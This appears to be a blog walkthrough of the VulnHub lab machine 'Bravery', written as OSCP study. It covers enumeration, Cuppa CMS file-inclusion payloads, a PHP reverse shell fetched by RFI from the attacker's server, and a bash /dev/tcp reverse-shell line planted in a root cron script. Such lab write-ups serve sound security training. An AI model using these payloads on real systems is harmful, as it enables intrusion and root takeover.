Open in app

Sign in

Write

Sign in

Bravery — Walkthrough

Rafael Medeiros
9 min readApr 8, 2021

This is the seventh post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.

URL: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Release date: 28 Dec 2018

Author: Donavan

Provided description: This machine hopes to inspire BRAVERY in you; this machine may surprise you from the outside. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived, and made more nefarious than the original.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Bravery is (#1): a positive trait in people, (#2): another way of saying “try harder”, (#3): https://www.youtube.com/watch?v=k2QPJ2xGMiY

Note: There may be more than one method to obtain root privileges on this machine. Look around you!

At the time of this writing, this is the second VM of NetSecFocus list.

Vulnerabilities Found:

Remote File Inclusion

Local File Inclusion

Sensitive File Disclosure

Privilege Escalation

#Scanning and Enumeration

Nmap

The Nmap scan reveals that we have a long path ahead. Interesting points to take note here:

  • 445 — SMB
  • 2049 — NFS
  • 3306 — MYSQL

nmap -T4 <ipaddress>

Gobuster

Enumerating the directories revealed some useless pages:

gobuster dir -u http://<ipaddress> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php

After going through all of them I found a hint on page “8”:

The scan on port 8080 revealed more pages:

gobuster dir -u http://<ipaddress>:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php

On public page, we got a company web page, but nothing interesting there:

On private, well, it’s private:

Enum4Linux

Because we have an SMB port open, we have to enumerate that port as well:

Enum4linux –a <ipaddress>

With all the results, the interesting parts are here:

We got an anonymous share. Could we connect to it anonymously?

The secured one is requesting a user and password, so, it’s not interesting right now.

We also have some local users:

david, ossec,ossecm, and rick.

Let’s connect to the anonymous share, shall we?

We can do that using smbclient and escaping the backslashes:

smbclient \\\\<ipaddress>\\anonymous

I went through all those folders before realizing that this was a rabbit hole, so, no relevant information here that could help us with.

Ok, time to go ahead. There is one more port that we haven’t tried yet.

Because we saw an NFS port open and running, it’s time to enumerate it. Running the following command reveals some interesting things to investigate further:

showmount -e <ipaddress>

Where -e is used to show the exports that are on that server;

To mount this export, we can use the following commands:

#Creates a folder in /tmp called mount

Mkdir /tmp/mount

#Mounts the /var/nfsshare to our recently created /tmp/mount folder

sudo mount <victimIP>:/var/nfsshare /tmp/mount

Navigate to the folder we’ve just created and we will get the following:

After reading all the files and spending some time on it, I realized one thing that I highlighted with the red arrows:

Yes! We got a user and a password here. Take your notes:

david

qwertyuioplkjhgfdsazxcvbnm

Remember that we had a “secured” share that we didn’t have access to? What if we try the credentials above? Our scanning and enumeration phase is over, it’s time to get our hands dirty.

#Exploiting

Let’s make another folder to mount the other share:

mkdir /tmp/secured

sudo mount //<victimIP>/secured /tmp/secured -o username=david

Where -o is used to specify the option “username”.

It worked:

Navigate to /tmp/secured and you’ll get the following 3 files:

The only thing that rang a bell for me was that URL pointed with the red arrow. We can try that on our browser:

It seems to be their corporate page, I quickly looked at the top ribbon that says “Internal Use Only”. Clicking on the second option led me to a CMS called Cuppa:

Searching on the internet, I found a File Inclusion exploit for this guy:

Offensive Security's Exploit Database Archive

Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion. CVE-94101 . webapps exploit for PHP platform

www.exploit-db.com

This is brilliant! We got 2 ways of exploiting it:

If we try the second one, we see that the exploit is really working:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

The LFI is working! how about searching the configuration file:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It is a long string base 64 encoded. I usually use the following website to decrypt that:

https://gchq.github.io/CyberChef/

This shows us the root password. We can keep that in our notes.

For now, it’s not useful to us, we can go ahead and try the second payload.

The second payload is a Remote File Inclusion. All we have to do is to trick the victim server to access our upload server that we will set up and download a reverse shell file.

A good source to get a php reverse shell is the pentest monkey one. I got that file and modified only the IP and the port I wanted the server to connect to:

Once you have that file ready, you have to configure a http server for the server to get that reverse shell file. You can do that by going to the file’s folder and running the following command:

python3 -m “http.server”

This is a simple module that will start a http server in our machine. Here it is using the 8000 port, so let’s force the victim server to get the file from there, but first, open up a new listener on the port you configured on the reverse shell file, in my case I used 53 port:

sudo nc -lvp

We are all set, let’s force the server to get our shell file:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.15.5:8000/php-rev.php

The page will keep loading, but you will see if the server got the file with this message:

And if you look at your listener:

We got the low level shell!

We also got a message from the creator:

#Escalating Privileges

Ok, the first thing I thought when I got this shell was to connect to mysql and see if we could find any user credentials around there. Because we have root credentials, let’s connect to it as root:

mysql -u root -p

#We show the databases with:

show databases;

#Select the bravery one:

use bravery;

The one we are looking for is something related with users.

#We show the tables using:

show tables;

And if we select all the results from that users table, we have all the users’ passwords:

I immediately ran to the Crackstation website since they are all MD5 hashes. But only 3 of them worked:

We know that we don’t have genevieve, govindasamy and roland users on that server, so in the end, it was useless. If you know a way to use these credentials to escalate privileges, leave us a comment at the end of this post!

I decided to move on and try other things. I ran linenum.sh script to see if I can find anything useful. Looking at the script output for some time revealed 2 things:

It is running a cron daemon, but for what?

A binary with sticky bit set. We can use it to copy and override files maybe?

I then walked around to find any file that could be possibly running with the cron, and then I found this suspicious file on /var/www:

Looks like a file that could possibly be executed by a cron job, isn’t it? I don’t know if this information made your wheels start spinning on your head, but, we can use that cp command to overwrite this file and give us a root shell!

I found this useful website that contains some reverse shells that we can use here. I picked up the second bash reverse shell and echoed it to a file called maintenance.sh:

echo “0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196” > /tmp/maintenance.sh

All we need to do now is to override the file with:

cd /tmp

/usr/bin/cp maintenance.sh /var/www/maintenance.sh

All good now, the file has been overwritten:

Set up a listener on the port you put on the payload and go grab yourself a coffee, our root shell is coming:

There it is! It took me at least 3 minutes to get the shell. You can find the proof file on /root directory. Congratulations!

#Bonus

I was curious to see how that cron job was set, so then I found this stackoverflow Q&A showing us different locations to set a cron job. I went to /var/spool/cron and here’s what I found:

The script was set to per-user crontabs and in root file, the job ran every 5 minutes. Cool!

#Conclusion

I spent more time on this machine due to a lot of rabbit holes I thought it was the correct path to progress. But it was good to learn that there are times we have to give up and try to find another way to keep progressing. I’ve learned more about NFS and SMB and how to exploit them and also how to use the command line tools to navigate through them. If you have any questions, please do so in the comments, I will try my best to help you.

I see you in the next post. Happy Hacking!

Bravery
Vulnerability
Vulnhub
Oscp
Walkthrough

--

--

Rafael Medeiros

Written by Rafael Medeiros

187 Followers

DevOps Engineer | 3x Azure | CKA | Terraform Fanatic | Another IT Professional willing to help the community

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams